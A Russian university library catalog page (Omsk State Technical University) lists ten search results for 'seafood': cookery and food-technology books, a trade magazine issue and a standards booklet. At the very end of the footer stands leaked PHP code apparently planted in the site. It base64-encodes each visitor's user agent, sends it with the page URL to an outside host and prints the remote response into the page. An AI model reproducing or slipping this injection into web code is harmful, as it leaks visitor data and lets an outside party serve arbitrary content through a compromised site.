Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

293 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=МОРЕПРОДУКТ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 10
1. 
Богушева, Валентина Ивановна. Технология приготовления пищи [Текст] / В. И. Богушева, 2010. - 374, [1] с.
Держатели документа (Информация об экземплярах) 

В пособии представлен весь комплекс теоретических основ производства продукции общественного питания.

Дана характеристика химического состава и физических свойств различных продуктов. Рассмотрены основные способы и приемы первичной обработки сырья и приготовления полуфабрикатов. Характеризуются приемы тепловой обработки, а также изменения, происходящие в продуктах под влиянием высоких температур.

Основная часть пособия посвящена технологии приготовления кулинарных блюд, правилам их оформления и подачи.

Особое внимание обращается на требования, предъявляемые к качеству продукции общественного питания, срокам ее хранения и реализации.

В последних главах освещаются вопросы лечебного и детского питания, дается характеристика различных диет.

Предназначено для студентов технологических, торгово-экономических, кооперативных колледжей и техникумов. Он может представлять интерес и для практических работников, обучающихся в системе переподготовки кадров и повышения квалификации.

2. 
Идентификационная и товарная экспертиза продуктов белкового питания и пищевых жиров [Текст] / Т. Г. Родина [и др.] ; ред. Т. Г. Родина, 2013. - 543, [1] с.
Держатели документа (Информация об экземплярах) 

Состояние продовольственного рынка на современном этапе, в частности насыщение его фальсифицированными и контрафактными товарами, обусловливает необходимость развития методов идентификационной экспертизы.

В учебнике рассмотрены актуальные вопросы идентификационной и товарной экспертизы продуктов; назначение и правовые основы идентификации, виды товарной экспертизы. Основное внимание уделяется ассортиментной и категорийной идентификации товаров, позволяющей выявить признаки фальсификации. В целях гармонизации отечественных и зарубежных подходов к экспертизе качества приводятся сведения о некоторых международных стандартах ФАО/ВОЗ по группе рыбных товаров и морепродуктов.

Для специалистов, бакалавров и магистров, а также для аспирантов, научных работников и специалистов, работающих в области товароведения, товарного менеджмента, маркетинга, технологии, стандартизации и сертификации товаров.

3. 
Высоцкая, Юлия. 365 рецептов на каждый день [Текст] / Ю. Высоцкая ; дар. Г. А. Кириленко, 2014. - 414 с.
Держатели документа (Информация об экземплярах) 
4. 
Современная торговля. - Журнал, 2005г. № 6
Оглавление 
  • Федорова, Ю. Принять нельзя отклонить / Ю. Федорова, Е. Мясин. - с.13-15 : ил.
  • Проблемы сетей оптом и в розницу. - с.17-22 : ил.
  • Земля меняет градус. - с.23-24
  • Структура российского пивного рынка. - с.24-33 : ил.
    Кл. слова: Пивная этикетка, Текила
  • Вина, любимые до бешенства. - с.25-33
  • Россия тянется к здоровью. - с.34-41 : ил.
    Кл. слова: Рынок морепродуктов, Морепродукт, Морской деликатес
  • В Америке поиграют в роскошь. - с.52-53 : ил.
    Кл. слова: Сеть магазинов роскоши Neiman Marcus
  • Под крылом кукушки; особенности развития "русского" франчайзинга. - с.55-60 : ил.
  • Магазин "по-домашнему". - с.61-64 : ил.
  • Идеи - на заморозку. - с.65-83 : ил.
    Кл. слова: Устройство магазина, Планирование супермаркета
  • Бухгалтеры рискуют стать аутсайдерами. - с.84-86 : табл.
  • Не опоздай на "упрощенку". - с.87-88 : ил.
    Кл. слова: Упрощенная система налогообложения
  • Сколько литров разрешено на человека? Экономическая обоснованность глазами ФНС. - с.89-90
    Кл. слова: Статья 252 НК РФ
  • "Умная" упаковка. - с.91-96 : ил.
  • Нелегко быть рыжим. - с.97-101
    Кл. слова: Магазин "Рыжая тыква", Экомаркет, Экологически чистый продукт
  • Вся правда о полезных напитках. - с.35-37
    Кл. слова: Чай, Кофе, Какао
5. 
Идентификационная и товарная экспертиза продуктов белкового питания и пищевых жиров [Текст] / Т. Г. Родина [и др.] ; ред. Т. Г. Родина, 2011. - 543, [1] с.
Держатели документа (Информация об экземплярах) 

Состояние продовольственного рынка на современном этапе, в частности насыщение его фальсифицированными и контрафактными товарами, обусловливает необходимость развития методов идентификационной экспертизы.

В учебнике рассмотрены актуальные вопросы идентификационной и товарной экспертизы продуктов; назначение и правовые основы идентификации, виды товарной экспертизы. Основное внимание уделяется ассортиментной и категорийной идентификации товаров, позволяющей выявить признаки фальсификации. В целях гармонизации отечественных и зарубежных подходов к экспертизе качества приводятся сведения о некоторых международных стандартах ФАО/ВОЗ по группе рыбных товаров и морепродуктов.

Для специалистов, бакалавров и магистров, а также для аспирантов, научных работников и специалистов, работающих в области товароведения, товарного менеджмента, маркетинга, технологии, стандартизации и сертификации товаров.

6. 
Кулинарные рецепты: Из "Книги о вкусной и здоровой пище" [Текст] / сост. Л. И. Воробьева ; дар.: Л. К. Жарина, Л. К. Жарина, 1988. - 334, [1] с.
Ключевые слова 
ЗАКУСКА -- БУТЕРБРОД -- САЛАТ -- ИКРА -- ПАШТЕТ -- СОУС -- МАЙОНЕЗ -- БУЛЬОН -- СУП -- ОКРОШКА -- МЯСО -- КОТЛЕТА -- ТЕФТЕЛИ -- ШНИЦЕЛЬ -- ПЕЛЬМЕНИ -- КУРИЦА -- ДИЧЬ -- РЫБА -- МОРЕПРОДУКТ -- ТВОРОЖНИКИ -- ВАРЕНИК -- БЛИНЧИКИ -- ЗАПЕКАНКА -- ПУДИНГ -- ОМЛЕТ -- ОВОЩИ -- ГРИБЫ -- КАРТОФЕЛЬ -- ФОРШМАК -- КАША -- ПЛОВ -- КЛЕЦКИ -- ЧЕБУРЕК -- КУКУРУЗА -- ФАСОЛЬ -- ГОРОХ -- ЧЕЧЕВИЦА -- ПИРОЖОК -- ВАТРУШКА -- БУЛКА -- ОЛАДЬИ -- РУЛЕТ -- ПИРОЖНОЕ -- ТОРТ -- КЕКС -- ПОНЧИК -- ХВОРОСТ -- КИСЕЛЬ -- КОМПОТ -- ЖЕЛЕ -- МУСС -- КРЕМ -- ПУДИНГ -- ШАРЛОТКА -- МАРИНАД -- СОЛЕНЬЕ -- МАРИНАД -- КОНСЕРВИРОВАНИЕ -- ЗАМОРАЖИВАНИЕ -- ЯГОДЫ
Держатели документа (Информация об экземплярах) 
7. 
Фурс, Иван Николаевич. Технология производства продукции общественного питания [Текст] : Учеб. пособие для вузов по специальности "Коммерческая деятельность" / И. Н. Фурс, 2002. - 798 с.
Держатели документа (Информация об экземплярах) 

Данный курс является комплексной дисциплиной, включающей физиологические основы рационального питания, основы гигиены и санитарии, общие представления о технологии производства продуктов питания, технологии обработки сырья и приготовления полуфабрикатов. Рассмотрены вопросы контроля качества, товароведения продовольственных товаров, экономики общественного питания, организации производства и обслуживания и др.

8. 
Справочник кадровика [Текст]. Т. 5 : Профессии рабочих ЕТКСВып. 1, 50, 52, 2002. - 365 с.
Держатели документа (Информация об экземплярах) 
9. 
Микроволновая кухня каждый день [Текст] / сост. Ю. Р. Васильев ; дар. И. Ю. Морозов, 1995. - 383 с.
Держатели документа (Информация об экземплярах) 
10. 
Консервы, пресервы из рыбы и морепродуктов [Текст] : Термины и определения, 1998. - 4 с.
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2906 - 25.05.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 1.22 с.14 запросов, 0.97c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;